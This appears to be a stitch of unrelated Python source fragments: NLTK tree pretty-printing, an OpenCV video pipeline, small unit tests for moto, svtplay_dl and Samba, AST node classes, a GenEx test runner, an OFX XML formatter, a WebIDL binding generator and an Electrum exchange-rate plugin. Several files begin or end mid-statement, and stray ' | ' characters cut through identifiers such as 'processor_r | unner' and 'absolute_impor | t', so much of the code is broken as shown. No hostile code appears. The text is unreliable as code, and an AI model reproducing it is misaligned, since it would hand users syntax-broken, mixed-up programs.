s = s.replace('\n', ' ').replace('\t', ' ')
offset = pos
if len(s) > pos+10:
s = s[:pos+10]+'...'
if pos > 10:
s = '...'+s[pos-10:]
offset = 13
msg += '\n%s"%s"\n%s^' % (' '*16, s, ' '*(17+offset))
raise ValueError(msg)
#////////////////////////////////////////////////////////////
# Visualization & String Representation
#////////////////////////////////////////////////////////////
def draw(self):
"""
Open a new window containing a graphical diagram of this tree.
"""
from nltk.draw.tree import draw_trees
draw_trees(self)
def pretty_print(self, sentence=None, highlight=(), stream=None, **kwargs):
"""
Pretty-print this tree as ASCII or Unicode art.
For explanation of the arguments, see the documentation for
`nltk.treeprettyprinter.TreePrettyPrinter`.
"""
from nltk.treeprettyprinter import TreePrettyPrinter
print(TreePrettyPrinter(self, sentence, highlight).text(**kwargs),
file=stream)
def __repr__(self):
childstr = ", ".join(unicode_repr(c) for c in self)
return '%s(%s, [%s])' % (type(self).__name__, unicode_repr(self._label), childstr)
def _repr_png_(self):
"""
Draws and outputs in PNG for ipython.
PNG is used instead of PDF, since it can be displayed in the qt console and
has wider browser support.
"""
import os
import base64
import subprocess
import tempfile
from nltk.draw.tree import tree_to_treesegment
from nltk.draw.util import CanvasFrame
from nltk.internals import find_binary
_canvas_frame = CanvasFrame()
widget = tree_to_treesegment(_canvas_frame.canvas(), self)
_canvas_frame.add_widget(widget)
x, y, w, h = widget.bbox()
# print_to_file uses scrollregion to set the width and height of the pdf.
_canvas_frame.canvas()['scrollregion'] = (0, 0, w, h)
with tempfile.NamedTemporaryFile() as file:
in_path = '{0:}.ps'.format(file.name)
out_path = '{0:}.png'.format(file.name)
_canvas_frame.print_to_file(in_path)
_canvas_frame.destroy_widget(widget)
subprocess.call([find_binary('gs', binary_names=['gswin32c.exe', 'gswin64c.exe'], env_vars=['PATH'], verbose=False)] +
'-q -dEPSCrop -sDEVICE=png16m -r90 -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -dSAFER -dBATCH -dNOPAUSE -sOutputFile={0:} {1:}'
.format(out_path, in_path).split())
with open(out_path, 'rb') as sr:
res = sr.read()
os.remove(in_path)
os.remove(out_path)
return base64.b64encode(res).decode()
def __str__(self):
return self.pformat()
def pprint(self, **kwargs):
"""
Print a string representation of this Tree to 'stream'
"""
if "stream" in kwargs:
stream = kwargs["stream"]
del kwargs["stream"]
else:
stream = None
print(self.pformat(**kwargs), file=stream)
def pformat(self, margin=70, indent=0, nodesep='', parens='()', quotes=False):
"""
:return: A pretty-printed string representation of this tree.
:rtype: str
:param margin: The right margin at which to do line-wrapping.
:type margin: int
:param indent: The indentation level at which printing
begins. This number is used to decide how far to indent
subsequent lines.
:type indent: int
:param nodesep: A string that is used to separate the node
from the children. E.g., the default value ``':'`` gives
trees like ``(S: (NP: I) (VP: (V: saw) (NP: it)))``.
"""
# Try writing it on one line.
s = self._pformat_flat(nodesep, parens, quotes)
if len(s) + indent < margin:
return s
# If it doesn't fit on one line, then write it on multi-lines.
if isinstance(self._label, string_types):
s = '%s%s%s' % (parens[0], self._label, nodesep)
else:
s = '%s%s%s' % (parens[0], unicode_repr(self._label), nodesep)
for child in self:
if isinstance(child, Tree):
s += '\n'+' '*(indent+2)+child.pformat(margin, indent+2,
nodesep, parens, quotes)
elif isinstance(child, tuple):
s += '\n'+' '*(indent+2)+ "/".join(child)
elif isinstance(child, string_types) and not quotes:
s += '\n'+' '*(indent+2)+ '%s' % child
else:
s += '\n'+' '*(indent+2)+ unicode_repr(child)
return s+parens[1]
def pformat_latex_qtree(self):
r"""
Returns a representation of the tree compatible with the
LaTeX qtree package. This consists of the string ``\Tree``
followed by the tree represented in bracketed notation.
For example, the following result was generated from a parse tree of
the sentence ``The announcement astounded us``::
\Tree [.I'' [.N'' [.D The ] [.N' [.N announcement ] ] ]
[.I' [.V'' [.V' [.V astounded ] [.N'' [.N' [.N us ] ] ] ] ] ] ]
See http://www.ling.upenn.edu/advice/latex.html for the LaTeX
style file for the qtree package.
:return: A latex qtree representation of this tree.
:rtype: str
"""
reserved_chars = re.compile('([#\$%&~_\{\}])')
pformat = self.pformat(indent=6, nodesep='', parens=('[.', ' ]'))
return r'\Tree ' + re.sub(reserved_chars, r'\\\1', pformat)
def _pformat_flat(self, nodesep, parens, quotes):
childstrs = []
for child in self:
if isinstance(child, Tree):
childstrs.append(child._pformat_flat(nodesep, parens, quotes))
elif isinstance(child, tuple):
childstrs.append("/".join(child))
elif isinstance(child, string_types) and not quotes:
childstrs.append('%s' % child)
else:
childstrs.append(unicode_repr(child))
if isinstance(self._label, string_types):
return '%s%s%s %s%s' % (parens[0], self._label, nodesep,
" ".join(childstrs), parens[1])
else:
return '%s%s%s %s%s' % (parens[0], unicode_repr(self._label), nodesep,
" ".join(childstrs), parens[1])
class ImmutableTree(Tree):
def __init__(self, node, children=None):
super(ImmutableTree, self).__init__(node, children)
# Precompute our hash value. This ensures that we're really
# immutable. It also means we only have to calculate it once.
try:
self._hash = hash((self._label, tuple(self)))
| except (TypeError, ValueError):
raise ValueError("%s: node value and children "
"must be immutable" % type(self).__name__)
def __setitem__(self, index, value):
raise ValueError('%s may not be modified' % type(self).__name__)
def __setslice__(self, i, j, value):
raise ValueError('%s may not be modified' % type( | self).__name__)
def __delitem__(self, index):
raise ValueError('%s may not be modified' % type(self).__name__)
def __delslice__(self, i, j):
raise ValueError('%s may not be modified' % type(self).__name__)
def __iadd__(self, other):
raise ValueError('%s may not be modified' % type(self).__name__)
def __imul__(self, other):
raise ValueError('%s may not be modified' % type(self).__name__)
def append(self, v):
raise ValueError('%s may not be modified' % type(self).__name__)
def extend(self, v):
raise ValueError('%s may not be modified' % type(self).__name__)
def pop(self, v=None):
raise ValueError('%s may not be modified' % type(self).__name |
# Copyright 2019 Google LLC.
"""Pipeline to decode and reencode a video using OpenCV."""
from absl import app
from absl import flags
from video_processing import processor_r | unner
from video_processing.processors import opencv_video_decoder
from video_processing.processors import opencv_video_encoder
flags.DEFINE_string('input_ | video_file', '', 'Input file.')
flags.DEFINE_string('output_video_file', '', 'Output file.')
FLAGS = flags.FLAGS
def pipeline(input_video_file, output_video_file):
return [
opencv_video_decoder.OpenCVVideoDecoderProcessor(
{'input_video_file': input_video_file}),
opencv_video_encoder.OpenCVVideoEncoderProcessor(
{'output_video_file': output_video_file})
]
def main(unused_argv):
processor_runner.run_processor_chain(
pipeline(FLAGS.input_video_file, FLAGS.output_video_file))
if __name__ == '__main__':
app.run(main)
|
import boto
import sure # noqa
from mo | to import mock_ec2 |
@mock_ec2
def test_placement_groups():
pass
|
ts: (list of :class:`AST`) elements
"""
_fields = ("elts", "ctx")
class ListComp(expr, beginendloc):
"""
A list comprehension, e.g. ``[x for x in y]``.
:ivar elt: (:class:`AST`) comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class Name(expr):
"""
An identifier, e.g. ``x``.
:ivar id: (string) name
"""
_fields = ("id", "ctx")
class NameConstant(expr):
"""
A named constant, e.g. ``None``.
:ivar value: Python value, one of ``None``, ``True`` or ``False``
"""
_fields = ("value",)
class Num(expr):
"""
An integer, floating point or complex number, e.g. ``1``, ``1.0`` or ``1.0j``.
:ivar n: (int, float or complex) value
"""
_fields = ("n",)
class Repr(expr, beginendloc):
"""
A repr operation, e.g. ``\`x\```
**Emitted until 3.0.**
:ivar value: (:class:`AST`) value
"""
_fields = ("value",)
class Set(expr, beginendloc):
"""
A set, e.g. ``{x, y}``.
**Emitted since 2.7.**
:ivar elts: (list of :class:`AST`) elements
"""
_fields = ("elts",)
class SetComp(expr, beginendloc):
"""
A set comprehension, e.g. ``{x for x in y}``.
**Emitted since 2.7.**
:ivar elt: (:class:`AST`) comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class Str(expr, beginendloc):
"""
A string, e.g. ``"x"``.
:ivar s: (string) value
"""
_fields = ("s",)
class Starred(expr):
"""
A starred expression, e.g. ``*x`` in ``*x, y = z``.
:ivar value: (:class:`AST`) expression
:ivar star_loc: location of ``*``
"""
_fields = ("value", "ctx")
_locs = expr._locs + ("star_loc",)
class Subscript(expr, beginendloc):
"""
A subscript operation, e.g. ``x[1]``.
:ivar value: (:class:`AST`) object being sliced
:ivar slice: (:class:`slice`) slice
"""
_fields = ("value", "slice", "ctx")
class Tuple(expr, beginendloc):
"""
A tuple, e.g. ``(x,)`` or ``x,y``.
:ivar elts: (list of nodes) elements
"""
_fields = ("elts", "ctx")
cl | ass UnaryOp(expr):
"""
An unary operation, e.g. ``+x``.
:ivar op: (:class:`unaryop`) o | perator
:ivar operand: (:class:`AST`) operand
"""
_fields = ("op", "operand")
class Yield(expr):
"""
A yield expression, e.g. ``yield x``.
:ivar value: (:class:`AST`) yielded value
:ivar yield_loc: location of ``yield``
"""
_fields = ("value",)
_locs = expr._locs + ("yield_loc",)
class YieldFrom(expr):
"""
A yield from expression, e.g. ``yield from x``.
:ivar value: (:class:`AST`) yielded value
:ivar yield_loc: location of ``yield``
:ivar from_loc: location of ``from``
"""
_fields = ("value",)
_locs = expr._locs + ("yield_loc", "from_loc")
# expr_context
# AugLoad
# AugStore
# Del
# Load
# Param
# Store
class keyword(AST, commonloc):
"""
A keyword actual argument, e.g. in ``f(x=1)``.
:ivar arg: (string) name
:ivar value: (:class:`AST`) value
:ivar equals_loc: location of ``=``
"""
_fields = ("arg", "value")
_locs = commonloc._locs + ("arg_loc", "equals_loc")
class mod(AST, commonloc):
"""Base class for modules (groups of statements)."""
_fields = ("body",)
class Expression(mod):
"""A group of statements parsed as if for :func:`eval`."""
class Interactive(mod):
"""A group of statements parsed as if it was REPL input."""
class Module(mod):
"""A group of statements parsed as if it was a file."""
class operator(AST, commonloc):
"""Base class for numeric binary operators."""
class Add(operator):
"""The ``+`` operator."""
class BitAnd(operator):
"""The ``&`` operator."""
class BitOr(operator):
"""The ``|`` operator."""
class BitXor(operator):
"""The ``^`` operator."""
class Div(operator):
"""The ``\\`` operator."""
class FloorDiv(operator):
"""The ``\\\\`` operator."""
class LShift(operator):
"""The ``<<`` operator."""
class MatMult(operator):
"""The ``@`` operator."""
class Mod(operator):
"""The ``%`` operator."""
class Mult(operator):
"""The ``*`` operator."""
class Pow(operator):
"""The ``**`` operator."""
class RShift(operator):
"""The ``>>`` operator."""
class Sub(operator):
"""The ``-`` operator."""
class slice(AST, commonloc):
"""Base class for slice operations."""
class ExtSlice(slice):
"""
The multiple slice, e.g. in ``x[0:1, 2:3]``.
Note that multiple slices with only integer indexes
will appear as instances of :class:`Index`.
:ivar dims: (:class:`slice`) sub-slices
"""
_fields = ("dims",)
class Index(slice):
"""
The index, e.g. in ``x[1]`` or ``x[1, 2]``.
:ivar value: (:class:`AST`) index
"""
_fields = ("value",)
class Slice(slice):
"""
The slice, e.g. in ``x[0:1]`` or ``x[0:1:2]``.
:ivar lower: (:class:`AST`) lower bound, if any
:ivar upper: (:class:`AST`) upper bound, if any
:ivar step: (:class:`AST`) iteration step, if any
:ivar bound_colon_loc: location of first semicolon
:ivar step_colon_loc: location of second semicolon, if any
"""
_fields = ("lower", "upper", "step")
_locs = slice._locs + ("bound_colon_loc", "step_colon_loc")
class stmt(AST, commonloc):
"""Base class for statement nodes."""
class Assert(stmt, keywordloc):
"""
The ``assert x, msg`` statement.
:ivar test: (:class:`AST`) condition
:ivar msg: (:class:`AST`) message, if any
"""
_fields = ("test", "msg")
class Assign(stmt):
"""
The ``=`` statement, e.g. in ``x = 1`` or ``x = y = 1``.
:ivar targets: (list of assignable :class:`AST`) left-hand sides
:ivar value: (:class:`AST`) right-hand side
:ivar op_locs: location of equality signs corresponding to ``targets``
"""
_fields = ("targets", "value")
_locs = stmt._locs + ("op_locs",)
class AugAssign(stmt):
"""
The operator-assignment statement, e.g. ``+=``.
:ivar target: (assignable :class:`AST`) left-hand side
:ivar op: (:class:`operator`) operator
:ivar value: (:class:`AST`) right-hand side
"""
_fields = ("target", "op", "value")
class Break(stmt, keywordloc):
"""The ``break`` statement."""
class ClassDef(stmt, keywordloc):
"""
The ``class x(z, y):· t`` (2.6) or
``class x(y, z=1, *t, **u):· v`` (3.0) statement.
:ivar name: (string) name
:ivar bases: (list of :class:`AST`) base classes
:ivar keywords: (list of :class:`keyword`) keyword arguments; **emitted since 3.0**
:ivar starargs: (:class:`AST`) splat argument (if any), e.g. in ``*x``; **emitted since 3.0**
:ivar kwargs: (:class:`AST`) keyword splat argument (if any), e.g. in ``**x``; **emitted since 3.0**
:ivar body: (list of :class:`AST`) body
:ivar decorator_list: (list of :class:`AST`) decorators
:ivar keyword_loc: location of ``class``
:ivar name_loc: location of name
:ivar lparen_loc: location of ``(``, if any
:ivar star_loc: location of ``*``, if any; **emitted since 3.0**
:ivar dstar_loc: location of ``**``, if any; **emitted since 3.0**
:ivar rparen_loc: location of ``)``, if any
:ivar colon_loc: location of ``:``
:ivar at_locs: locations of decorator ``@``
"""
_fields = ("name", "bases", "keywords", "starargs", "kwargs", "body", "decorator_list")
_locs = keywordloc._locs + ("name_loc", "lparen_loc", "star_loc", "dstar_loc", "rparen_loc",
"colon_loc", "at_locs")
class Continue(stmt, keywordloc):
"""The ``continue`` statement."""
class Delete(stmt, keywordloc):
"""
The ``del x, y`` statement.
:ivar targets: (list of :class:`Name`)
"""
_fields = ("targets",)
class Exec(stmt, keywordloc):
"""
The ``exec code in locals, globals`` statement.
**Emitted until 3.0.**
:ivar body: (:class:`AST`) code
:ivar locals: (:class:`AST`) locals
:ivar globals: (:class:`AST`) globals
:ivar keyword_loc: location of ``exec``
:ivar in_loc: l |
#! /usr/bin/env python
# @brief Script to run apropriate tests.
import os
import distutils.core
from shutil import rmtree, copyfile
"""Avaiable tests dictionary in the format no_of_test : name_of_test"""
tests = {0:"default Generator.dat with lot of comments and explanations",
1:"RHIC pt_pi, eta_pi; tecm = 200GeV; Lambda2=1",
2:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1",
3:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6",
4:"RHIC pt_pi, eta_pi; tecm = 500GeV; Lambda2=1",
5:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1",
6:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1.6",
7:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.2",
8:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.6",
9:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.2",
10:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.6",
11:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.2",
12:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.6",
13:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.2",
14:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.6",
15:"2to5; y_pi, tecm = 200GeV",
16:"CPS, N=5, y_pi, tecm = 200GeV",
17:"2to5; y_pi, t, tecm = 200GeV",
18:"CPS, N=5, y_pi, t, tecm = 200GeV",
19:"CPS, N=5, Exploration Cuts, y_pi, t, tecm = 200GeV",
20:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; LS method of Phase Space generation",
21:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; 2toN (N=4) method of Phase Space generation",
22:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 1000 = nSampl, y in [-8;8]",
23:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-8;8]",
24:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 10000, y in [-8;8]",
25:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-2;2]",
26:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000 = nSampl, y in [-2;2]"
}
def prepareTest( number, testDir = './Tests', testName = 'test', configFile = 'Generator.dat' ):
"""Prepare configuration file by picking one of the test file from testDir
@param testDir dir containing tests
@param testName basename of test
@param configFile configuration file for generator
| """
#save old config file
copyfile(configFile, "OLD"+configFile)
#copy configuration files
fromDirectory = testDir + '/' + testName + str(number)
copyfile(fromDirectory, configFile)
return testDir
| def rmDir( directory = "./" ):
"""Remove directory and all its content
@param directory base directory for project
"""
rmtree( directory )
def runMake( option, runDir = './'):
"""Run make with option in given directory
@param option option for make
@param runDir directory in which make will be executed
"""
os.system( 'make -C ' + runDir + ' ' + option)
def showTests( testDict ):
"""Show tests in dictionary
@param testDict dictionary with tests in the format no_of_test : name_of_test
"""
print("#########################")
print("AVAIBLE TESTS:")
print("#########################")
for key in testDict:
print( str(key) + ' -- '+ str(testDict[key]) )
print("#########################")
def pickTest( testDict ):
"""Allows user to pick option from the keys of dictionary and returns it
@param testDict dictionary with tests in the format no_of_test : name_of_test
"""
finish = False
while not finish:
showTests(testDict)
input_var = input("Enter option: ")
print ("you entered " + str(input_var))
if input_var in testDict.keys():
finish = True
return input_var
def main():
"""Simple test suit for GenEx. It copy Core GenEx files and selected
configuration files to one test directory and then run it and remove test directory"""
testNo = pickTest( tests )
print("Preparing generator...")
prepareTest(testNo)
print("...DONE")
print("Start test...")
runMake('run')
print("...DONE")
print("Cleaning dir...")
runMake('clean')
print("...DONE")
if __name__ == "__main__":
main()
|
#!/usr/bin/python
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
# The unittest framwork doesn't play nice with pylint:
# pylint: disable-msg=C0103
from __future__ import absolute_impor | t
import unittest
from svtplay_dl.service.oppetarkiv import OppetArkiv
from svtplay_dl.service.tests import HandlesURLsTestMixin
class handlesTest(unittest.TestCase, HandlesURLsTestMixin):
service = OppetArkiv
urls = {"ok": ["http://www.oppetarkiv.se/video/1129844/jacobs-stege-avsnitt-1-av-1"], "bad": ["http://www.svtplay.se/video/10 | 90393/del-9"]}
|
#!/usr/bin/env python
# Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <jelmer@samba.org> 2007-2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Samba Python tests."""
import ldb
import os
import samba
from samba.tests import TestCase, TestCaseInTempDir
class SubstituteVarTestCase(TestCase):
def test_empty(self):
self.assertEquals("", samba.substitute_var("", {}))
def test_nothing(self):
self.assertEquals("foo bar",
samba.substitute_var("foo bar", {"bar": "bla"}))
def test_replace(self):
| self.assertEquals("foo bla",
samba.substitute_var("foo ${bar}", {"bar": "bla"}))
def test_broken(self):
self.assertEquals("foo ${bdkjfhsdkfh sdkfh ",
samba.substitute_var("foo ${bdkjfhsdkfh sdkfh ", {"bar": "bla"}))
def test_unknown_var(self):
self.assertEquals("foo ${bla} | gsff",
samba.substitute_var("foo ${bla} gsff", {"bar": "bla"}))
def test_check_all_substituted(self):
samba.check_all_substituted("nothing to see here")
self.assertRaises(Exception, samba.check_all_substituted,
"Not subsituted: ${FOOBAR}")
class LdbExtensionTests(TestCaseInTempDir):
def test_searchone(self):
path = self.tempdir + "/searchone.ldb"
l = samba.Ldb(path)
try:
l.add({"dn": "foo=dc", "bar": "bla"})
self.assertEquals("bla",
l.searchone(basedn=ldb.Dn(l, "foo=dc"), attribute="bar"))
finally:
del l
os.unlink(path)
|
#coding: utf-8
# Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ofx.document - abstract OFX document.
#
import xml.sax.saxutils as sax
class Document:
def as_xml(self, original_format=None, date_format=None):
"""Formats this document as an OFX 2.0 XML document."""
xml = ""
# NOTE: Encoding in OFX, particularly in OFX 1.02,
# is kind of a mess. The OFX 1.02 spec talks about "UNICODE"
# as a supported encoding, which the OFX 2.0 spec has
# back-rationalized to "UTF-8". The "US-ASCII" encoding is
# given as "USASCII". Yet the 1.02 spec acknowledges that
# not everyone speaks English nor uses UNICODE, so they let
# you throw any old encoding in there you'd like. I'm going
# with the idea that if the most common encodings are named
# in an OFX file, they should be translated to "real" XML
# | encodings, and if no encoding is given, UTF-8 (which is a
# superset of US-ASCII) | should be assumed; but if a named
# encoding other than USASCII or 'UNICODE' is given, that
# should be preserved. I'm also adding a get_encoding()
# method so that we can start to survey what encodings
# we're actually seeing, and use that to maybe be smarter
# about this in the future.
#forcing encoding to utf-8
encoding = "UTF-8"
xml += """<?xml version="1.0" encoding="%s"?>\n""" % encoding
xml += """<?OFX OFXHEADER="200" VERSION="200" """ + \
"""SECURITY="%s" OLDFILEUID="%s" NEWFILEUID="%s"?>\n""" % \
(self.parse_dict["header"]["SECURITY"],
self.parse_dict["header"]["OLDFILEUID"],
self.parse_dict["header"]["NEWFILEUID"])
if original_format is not None:
xml += """<!-- Converted from: %s -->\n""" % original_format
if date_format is not None:
xml += """<!-- Date format was: %s -->\n""" % date_format
taglist = self.parse_dict["body"]["OFX"][0].asList()
xml += self._format_xml(taglist)
return xml
def _format_xml(self, mylist, indent=0):
xml = ""
indentstring = " " * indent
tag = mylist.pop(0)
if len(mylist) > 0 and isinstance(mylist[0], list):
xml += "%s<%s>\n" % (indentstring, tag)
for value in mylist:
xml += self._format_xml(value, indent=indent + 2)
xml += "%s</%s>\n" % (indentstring, tag)
elif len(mylist) > 0:
# Unescape then reescape so we don't wind up with '&lt;', oy.
value = sax.escape(sax.unescape(mylist[0]))
xml += "%s<%s>%s</%s>\n" % (indentstring, tag, value, tag)
return xml
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import cPickle
import WebIDL
from Configuration import *
from Codegen import CGBindingRoot, replaceFileIfChanged
# import Codegen in general, so we can set a variable on it
import Codegen
def generate_binding_header(config, outputprefix, webidlfile):
"""
|config| Is the configuration object.
|outputprefix| is a prefix to use for the header guards and filename.
"""
filename = outputprefix + ".h"
root = CGBindingRoot(config, outputprefix, webidl | file)
if replaceFileIfChanged(filename, root.declare()) | :
print "Generating binding header: %s" % (filename)
def generate_binding_cpp(config, outputprefix, webidlfile):
"""
|config| Is the configuration object.
|outputprefix| is a prefix to use for the header guards and filename.
"""
filename = outputprefix + ".cpp"
root = CGBindingRoot(config, outputprefix, webidlfile)
if replaceFileIfChanged(filename, root.define()):
print "Generating binding implementation: %s" % (filename)
def main():
# Parse arguments.
from optparse import OptionParser
usagestring = "usage: %prog [header|cpp] configFile outputPrefix webIDLFile"
o = OptionParser(usage=usagestring)
o.add_option("--verbose-errors", action='store_true', default=False,
help="When an error happens, display the Python traceback.")
(options, args) = o.parse_args()
if len(args) != 4 or (args[0] != "header" and args[0] != "cpp"):
o.error(usagestring)
buildTarget = args[0]
configFile = os.path.normpath(args[1])
outputPrefix = args[2]
webIDLFile = os.path.normpath(args[3])
# Load the parsing results
f = open('ParserResults.pkl', 'rb')
parserData = cPickle.load(f)
f.close()
# Create the configuration data.
config = Configuration(configFile, parserData)
# Generate the prototype classes.
if buildTarget == "header":
generate_binding_header(config, outputPrefix, webIDLFile);
elif buildTarget == "cpp":
generate_binding_cpp(config, outputPrefix, webIDLFile);
else:
assert False # not reached
if __name__ == '__main__':
main()
|
currencies/exchange_rates")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
if r[:7] == "btc_to_":
quote_currencies[r[7:].upper()] = self._lookup_rate_cb(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_bc(self):
try:
jsonresp = self.get_json('blockchain.info', "/ticker")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
quote_currencies[r] = self._lookup_rate(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
# print "updating exchange rate", self.quote_currencies["USD"]
def update_lb(self):
try:
jsonresp = self.get_json('localbitcoins.com', "/bitcoinaverage/ticker-all-currencies/")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
quote_currencies[r] = self._lookup_rate_lb(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_bv(self):
try:
jsonresp = self.get_json('api.bitcoinvenezuela.com', "/")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp["BTC"]:
quote_currencies[r] = Decimal(jsonresp["BTC"][r])
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_ba(self):
try:
jsonresp = self.get_json('api.bitcoinaverage.com', "/ticker/global/all")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
if not r == "timestamp":
quote_currencies[r] = self._lookup_rate_ba(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
| except KeyError:
pass
self. | parent.set_currencies(quote_currencies)
def get_currencies(self):
return [] if self.quote_currencies == None else sorted(self.quote_currencies.keys())
def _lookup_rate(self, response, quote_id):
return decimal.Decimal(str(response[str(quote_id)]["15m"]))
def _lookup_rate_cb(self, response, quote_id):
return decimal.Decimal(str(response[str(quote_id)]))
def _lookup_rate_ba(self, response, quote_id):
return decimal.Decimal(response[str(quote_id)]["last"])
def _lookup_rate_lb(self, response, quote_id):
return decimal.Decimal(response[str(quote_id)]["rates"]["last"])
class Plugin(BasePlugin):
def fullname(self):
return "Exchange rates"
def description(self):
return """exchange rates, retrieved from blockchain.info, CoinDesk, or Coinbase"""
def __init__(self,a,b):
BasePlugin.__init__(self,a,b)
self.currencies = [self.config.get('currency', "EUR")]
self.exchanges = [self.config.get('use_exchange', "Blockchain")]
def init(self):
self.win = self.gui.main_window
self.win.connect(self.win, SIGNAL("refresh_currencies()"), self.win.update_status)
self.btc_rate = Decimal(0.0)
# Do price discovery
self.exchanger = Exchanger(self)
self.exchanger.start()
self.gui.exchanger = self.exchanger #
def set_currencies(self, currency_options):
self.currencies = sorted(currency_options)
self.win.emit(SIGNAL("refresh_currencies()"))
self.win.emit(SIGNAL("refresh_currencies_combo()"))
def set_quote_text(self, btc_balance, r):
r[0] = self.create_quote_text(Decimal(btc_balance) / 100000000)
def create_quote_text(self, btc_balance):
quote_currency = self.config.get("currency", "EUR")
self.exchanger.use_exchange = self.config.get("use_exchange", "Blockchain")
cur_rate = self.exchanger.exchange(Decimal(1.0), quote_currency)
if cur_rate is None:
quote_text = ""
else:
quote_balance = btc_balance * Decimal(cur_rate)
self.btc_rate = cur_rate
quote_text = "%.2f %s" % (quote_balance, quote_currency)
return quote_text
def load_wallet(self, wallet):
self.wallet = wallet
tx_list = {}
for item in self.wallet.get_tx_history(self.wallet.storage.get("current_account", None)):
tx_hash, conf, is_mine, value, fee, balance, timestamp = item
tx_list[tx_hash] = {'value': value, 'timestamp': timestamp, 'balance': balance}
self.tx_list = tx_list
def requires_settings(self):
return True
def toggle(self):
out = BasePlugin.toggle(self)
self.win.update_status()
return out
def close(self):
self.exchanger.stop()
def history_tab_update(self):
if self.config.get('history_rates', 'unchecked') == "checked":
try:
tx_list = self.tx_list
except Exception:
return
try:
mintimestr = datetime.datetime.fromtimestamp(int(min(tx_list.items(), key=lambda x: x[1]['timestamp'])[1]['timestamp'])).strftime('%Y-%m-%d')
except ValueError:
return
maxtimestr = datetime.datetime.now().strftime('%Y-%m-%d')
try:
resp_hist = self.exchanger.get_json('api.coindesk.com', "/v1/bpi/historical/close.json?start=" + mintimestr + "&end=" + maxtimestr)
except Exception:
return
self.gui.main_window.is_edit = True
self.gui.main_window.history_list.setColumnCount(6)
self.gui.main_window.history_list.setHeaderLabels( [ '', _('Date'), _('Description') , _('Amount'), _('Balance'), _('Fiat Amount')] )
root = self.gui.main_window.history_list.invisibleRootItem()
childcount = root.childCount()
for i in range(childcount):
item = root.child(i)
try:
tx_info = tx_list[str(item.data(0, Qt.UserRole).toPyObject())]
except Exception:
newtx = self.wallet.get_tx_history()
v = newtx[[x[0] for x in newtx].index(str(item.data(0, Qt.UserRole).toPyObject()))][3]
tx_info = {'timestamp':int(datetime.datetime.now().strftime("%s")), 'value': v }
pass
tx_time = int(tx_info['timestamp'])
tx_time_str = datetime.datetime.fromtimestamp(tx_time).strftime('%Y-%m-%d')
try:
tx_USD_val = "%.2f %s" % (Decimal(tx_info['value']) / 100000000 * Decimal(resp_hist['bpi'][tx_time_str]), "USD")
except KeyError:
tx_USD_val = "%.2f %s" % (self.btc_rate * Decimal(tx_info['value'])/100000000 , "USD")
item.setText(5, tx_USD_val)
if Decimal(tx_info['value']) < 0:
item.setForeground(5, QBrush(QColor("#BC1E1E")))
for i, width in enumerate(self.gui.main_window.column_widths['history']):
self.gui.main_window.history_list.setColumnWidth(i, width)
